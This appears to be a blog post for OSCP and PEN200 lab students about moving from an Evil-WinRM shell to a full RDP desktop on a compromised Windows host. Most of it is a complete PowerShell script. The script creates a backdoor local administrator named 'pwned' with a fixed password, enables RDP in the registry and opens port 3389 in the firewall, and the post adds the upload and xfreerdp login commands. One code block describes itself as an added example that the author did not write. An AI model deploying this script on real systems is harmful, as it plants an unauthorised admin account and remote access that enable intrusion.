From Evil-WinRM to Full RDP Access

Jose Campo
2 min read · Jan 22, 2025


Ever been stuck in an Evil-WinRM session where commands misbehave, even after escalating to admin or SYSTEM with a tool like GodPotato? I have been there, and it is frustrating. If you are about to take the OSCP exam or are working through the PEN200 Challenge Labs, a restrictive, non-interactive CLI can slow you down. That is why I wrote this PowerShell script to automate enabling Remote Desktop Protocol (RDP) access, giving you a full Windows desktop so your tasks go faster and easier.

Uploading the script is easy: Evil-WinRM has a built-in upload command that takes the local path of the file and, optionally, the destination path on the target. Start evil-winrm from the Kali folder that contains the script (or give the full local path). Raj Chandel has an excellent tutorial on Evil-WinRM, including how to upload files, and his whole site is fantastic, so I suggest looking at his other pentesting articles as well.

🔑 What Does the Script Do?

This script automates the setup of RDP access by:

  1. Creating a Local Admin User: Creates a local user named pwned with a predefined password.
  2. Adding the User to the Administrators Group: Ensures pwned has full administrative privileges on the host.
  3. Enabling Remote Desktop: Sets the fDenyTSConnections registry value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server to 0 so the host accepts RDP connections.
  4. Configuring Firewall Rules: Opens TCP port 3389 for inbound RDP traffic in the Windows firewall.
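The four steps above, as an added example that is not the author's script from GitHub: an idempotent PowerShell script that creates the account, enables RDP, opens the firewall, verifies the result, and can undo its own changes. It assumes it runs with administrative rights (for example from a SYSTEM-level Evil-WinRM shell), an English-locale Windows 10 or Server 2016+ target, and the hypothetical account name, password and file path shown in the comments, all of which are placeholders to change before use.

```powershell
# Added example, not the article's script. Assumes an admin/SYSTEM shell on
# English-locale Windows 10 / Server 2016+. The user name, password and paths
# below are hypothetical placeholders.
param(
    [string]$UserName = 'pwned',                 # account name used in the article
    [string]$Password = 'Ch4ngeMe!Str0ngPass#'   # placeholder; pick your own
)

$ErrorActionPreference = 'Stop'
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$script:priorDenyValue = $null   # remembered so Remove-RdpAccess can restore it

function Enable-RdpAccess {
    # Step 1: create the local user. The LocalAccounts module is missing on
    # 32-bit hosts and pre-Windows-10 systems, so fall back to net.exe there.
    if (Get-Command New-LocalUser -ErrorAction SilentlyContinue) {
        if (-not (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue)) {
            $secure = ConvertTo-SecureString $Password -AsPlainText -Force
            New-LocalUser -Name $UserName -Password $secure -PasswordNeverExpires -AccountNeverExpires | Out-Null
        }
        # Step 2: local admin, plus Remote Desktop Users so the logon works
        # even if the admin membership is later removed.
        foreach ($group in 'Administrators', 'Remote Desktop Users') {
            if (-not (Get-LocalGroupMember -Group $group -Member $UserName -ErrorAction SilentlyContinue)) {
                Add-LocalGroupMember -Group $group -Member $UserName
            }
        }
    } else {
        net user $UserName $Password /add /y | Out-Null   # /y accepts passwords longer than 14 chars
        net localgroup Administrators $UserName /add | Out-Null
        net localgroup "Remote Desktop Users" $UserName /add | Out-Null
    }

    # Step 3: allow inbound Remote Desktop connections (0 = allow, 1 = deny).
    $script:priorDenyValue = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections
    Set-ItemProperty -Path $tsKey -Name 'fDenyTSConnections' -Value 0 -Type DWord

    # Step 4: open TCP/3389. The built-in rule group exists on English Windows;
    # otherwise add an explicit rule with netsh.
    if (Get-Command Enable-NetFirewallRule -ErrorAction SilentlyContinue) {
        Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    } else {
        netsh advfirewall firewall add rule name="Allow RDP 3389" dir=in action=allow protocol=TCP localport=3389 | Out-Null
    }

    # TermService is demand-start; make sure it is actually listening.
    Start-Service -Name TermService
}

function Test-RdpAccess {
    # Quick check of every step; all five fields should be True before you connect.
    [pscustomobject]@{
        UserExists   = [bool](net user $UserName 2>$null)
        IsAdmin      = [bool](net localgroup Administrators | Select-String -SimpleMatch $UserName)
        RdpAllowed   = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections -eq 0
        ServiceUp    = (Get-Service -Name TermService).Status -eq 'Running'
        Listening    = [bool](netstat -ano | Select-String ':3389\s+\S+\s+LISTENING')
    }
}

function Remove-RdpAccess {
    # Cleanup for when you are done: delete the account and put the RDP and
    # firewall settings back. Restores the previous fDenyTSConnections value
    # if this session recorded one, otherwise assumes RDP was off (1).
    $restore = if ($null -ne $script:priorDenyValue) { $script:priorDenyValue } else { 1 }
    Set-ItemProperty -Path $tsKey -Name 'fDenyTSConnections' -Value $restore -Type DWord
    if (Get-Command Disable-NetFirewallRule -ErrorAction SilentlyContinue) {
        Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    }
    netsh advfirewall firewall delete rule name="Allow RDP 3389" 2>$null | Out-Null
    net user $UserName /delete 2>$null | Out-Null
}

# Usage from an Evil-WinRM session (paths are hypothetical):
#   *Evil-WinRM* PS C:\> upload enable-rdp.ps1 C:\Windows\Temp\enable-rdp.ps1
#   *Evil-WinRM* PS C:\> Set-ExecutionPolicy Bypass -Scope Process -Force
#   *Evil-WinRM* PS C:\> . C:\Windows\Temp\enable-rdp.ps1     # dot-source: runs the steps, keeps Remove-RdpAccess available
# Then from Kali:
#   xfreerdp /v:<target-ip> /u:pwned /p:'Ch4ngeMe!Str0ngPass#' /cert:ignore /dynamic-resolution +clipboard
# When finished:
#   *Evil-WinRM* PS C:\> Remove-RdpAccess
Enable-RdpAccess
Test-RdpAccess | Format-List
```

Dot-sourcing the script (the leading `.`) keeps the three functions in your Evil-WinRM session, so `Remove-RdpAccess` is one command away when you are done. If `Listening` stays False after `ServiceUp` is True, check for a third-party firewall or a Group Policy that re-applies fDenyTSConnections.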

💡 Why Use This Script?

  • Optimized for OSCP: During the OSCP exam you have limited time to escalate privileges, enumerate targets, and achieve objectives. GUI access via RDP speeds up tasks like local enumeration and running tools interactively.
  • Overcomes Evil-WinRM Limitations: An Evil-WinRM shell is a non-interactive remote PowerShell session with no desktop, so tools that expect an interactive logon or a GUI can misbehave even after privilege escalation. With this script you get a normal interactive desktop as the new admin user and can use your access fully.
  • Saves Time: No need to tweak settings by hand or troubleshoot tools that act up over WinRM, like Mimikatz. From an interactive RDP session, commands run as they would on a local console, assuming the account has the required permissions.

The script can be found on my GitHub page: 👉 RDP Automation Script. It is intended only for the OSCP exam or the PEN200 Challenge Labs, though, so please keep that in mind. Running it on a real engagement can be very disruptive: it creates a new local administrator account, changes the RDP registry setting, and opens TCP port 3389 on the host firewall, and the account creation and group change are logged (Security events 4720 and 4732), which a defender will notice. If you do use it, remove the account and revert the settings when you are done.

If you found this helpful, I invite you to subscribe to my Medium page for more in-depth articles, pentesting tips, and exclusive scripts tailored for ethical hacking and certification prep. 🚀

This script has been tested on Windows 10 — your feedback and suggestions are always welcome. Enjoy!
